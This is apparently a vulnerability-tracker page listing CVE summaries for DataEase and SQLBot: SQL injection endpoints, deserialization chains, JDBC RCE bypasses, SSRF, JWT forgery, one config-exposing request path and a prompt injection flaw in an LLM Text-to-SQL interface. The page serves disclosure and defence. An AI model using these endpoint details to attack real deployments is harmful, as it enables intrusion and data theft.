VYPR
Vendor

Dataease

Products
2
CVEs
80
Across products
80
Status
Private

Products

2

Recent CVEs

80
View all 80 CVEs →
  • CVE-2026-33324HigMay 5, 2026
    risk 0.57cvss 8.8epss 0.01

    SQLBot is an intelligent Text-to-SQL system based on large language models and RAG. In versions 1.7.0 and earlier, the Text2SQL chat interface is vulnerable to prompt injection. The user-provided question parameter is directly concatenated into the LLM prompt without filtering…

  • CVE-2026-33122CriApr 16, 2026
    risk 0.57cvss 9.8epss 0.00

    DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection vulnerability in the API datasource update process. When a new table definition is added during a datasource update via /de2api/datasource/update, the…

  • CVE-2026-33082CriApr 16, 2026
    risk 0.57cvss 9.8epss 0.00

    DataEase is an open source data visualization analysis tool. Versions 2.10.20 and below contain a SQL injection vulnerability in the dataset export functionality. The expressionTree parameter in POST /de2api/datasetTree/exportDataset is deserialized into a filtering object and…

  • CVE-2026-40901HigApr 16, 2026
    risk 0.50cvss 8.8epss 0.01

    DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below ship the legacy velocity-1.7.jar, which pulls in commons-collections-3.2.1.jar containing the InvokerTransformer deserialization gadget chain. Quartz 2.3.2, also bundled in the…

  • CVE-2026-40900HigApr 16, 2026
    risk 0.50cvss 8.8epss 0.00

    DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection vulnerability in the /de2api/datasetData/previewSql endpoint. The user-supplied SQL is wrapped in a subquery without validation that the input is a single…

  • CVE-2026-33207HigApr 16, 2026
    risk 0.50cvss 8.8epss 0.00

    DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection vulnerability in the /datasource/getTableField endpoint. The getTableFiledSql method in CalciteProvider.java incorporates the tableName parameter directly…

  • CVE-2026-33121HigApr 16, 2026
    risk 0.50cvss 8.8epss 0.00

    DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection vulnerability in the API datasource saving process. The deTableName field from the Base64-encoded datasource configuration is used to construct a DDL…

  • CVE-2026-33084HigApr 16, 2026
    risk 0.50cvss 8.8epss 0.00

    DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection vulnerability in the sort parameter of the /de2api/datasetData/enumValueObj endpoint. The DatasetDataManage service layer directly transfers the user-supplied…

  • CVE-2026-33083HigApr 16, 2026
    risk 0.50cvss 8.8epss 0.00

    DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection vulnerability in the orderDirection parameter used in dataset-related endpoints including /de2api/datasetData/enumValueDs and…

  • CVE-2026-40899MedApr 16, 2026
    risk 0.35cvss 6.5epss 0.00

    DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a JDBC parameter blocklist bypass vulnerability in the MySQL datasource configuration. The Mysql class uses Lombok's @Data annotation, which auto-generates a public setter…

  • CVE-2025-15597MedMar 2, 2026
    risk 0.34cvss 6.3epss 0.01

    A vulnerability has been found in Dataease SQLBot up to 1.4.0. This affects an unknown function of the file backend/apps/system/api/assistant.py of the component API Endpoint. Such manipulation leads to improper access controls. It is possible to launch the attack remotely. The…

  • CVE-2026-8724MedMay 17, 2026
    risk 0.31cvss 4.7epss 0.00

    A security flaw has been discovered in Dataease 2.10.20. Impacted is the function SqlparserUtils.transFilter of the file SqlparserUtils.java of the component Data Dashboard. The manipulation results in sql injection. The attack may be launched remotely. The exploit has been…

  • CVE-2026-5417MedApr 2, 2026
    risk 0.31cvss 4.7epss 0.00

    A vulnerability was determined in Dataease SQLbot up to 1.6.0. This issue affects the function get_es_data_by_http of the file backend/apps/db/es_engine.py of the component Elasticsearch Handler. This manipulation of the argument address causes server-side request forgery. The…

  • CVE-2025-15598LowMar 3, 2026
    risk 0.24cvss 3.7epss 0.00

    A vulnerability was found in Dataease SQLBot up to 1.5.1. This impacts the function validateEmbedded of the file backend/apps/system/middleware/auth.py of the component JWT Token Handler. Performing a manipulation results in improper verification of cryptographic signature. The…

  • CVE-2024-30269Apr 8, 2024
    risk 0.10cvss epss 0.16

    DataEase, an open source data visualization and analysis tool, has a database configuration information exposure vulnerability prior to version 2.5.0. Visiting the `/de2api/engine/getEngine;.js` path via a browser reveals that the platform's database configuration is returned.…

  • CVE-2024-47073Nov 7, 2024
    risk 0.04cvss epss 0.01

    DataEase is an open source data visualization analysis tool that helps users quickly analyze data and gain insights into business trends. In affected versions a the lack of signature verification of jwt tokens allows attackers to forge jwts which then allow access to any…

  • CVE-2025-49002Jun 3, 2025
    risk 0.02cvss epss 0.42

    DataEase is an open source business intelligence and data visualization tool. Versions prior to version 2.10.10 have a flaw in the patch for CVE-2025-32966 that allow the patch to be bypassed through case insensitivity because INIT and RUNSCRIPT are prohibited. The vulnerability…

  • CVE-2024-46997Sep 23, 2024
    risk 0.02cvss epss 0.01

    DataEase is an open source data visualization analysis tool. Prior to version 2.10.1, an attacker can achieve remote command execution by adding a carefully constructed h2 data source connection string. The vulnerability has been fixed in v2.10.1.

  • CVE-2025-57772Aug 25, 2025
    risk 0.01cvss epss 0.08

    DataEase is an open source business intelligence and data visualization tool. Prior to version 2.10.12, there is a H2 JDBC RCE bypass in DataEase. If the JDBC URL meets criteria, the getJdbcUrl method is returned, which acts as the getter for the JdbcUrl parameter provided. This…

  • CVE-2025-57773Aug 25, 2025
    risk 0.01cvss epss 0.07

    DataEase is an open source business intelligence and data visualization tool. Prior to version 2.10.12, because DB2 parameters are not filtered, a JNDI injection attack can be directly launched. JNDI triggers an AspectJWeaver deserialization attack, writing to various files.…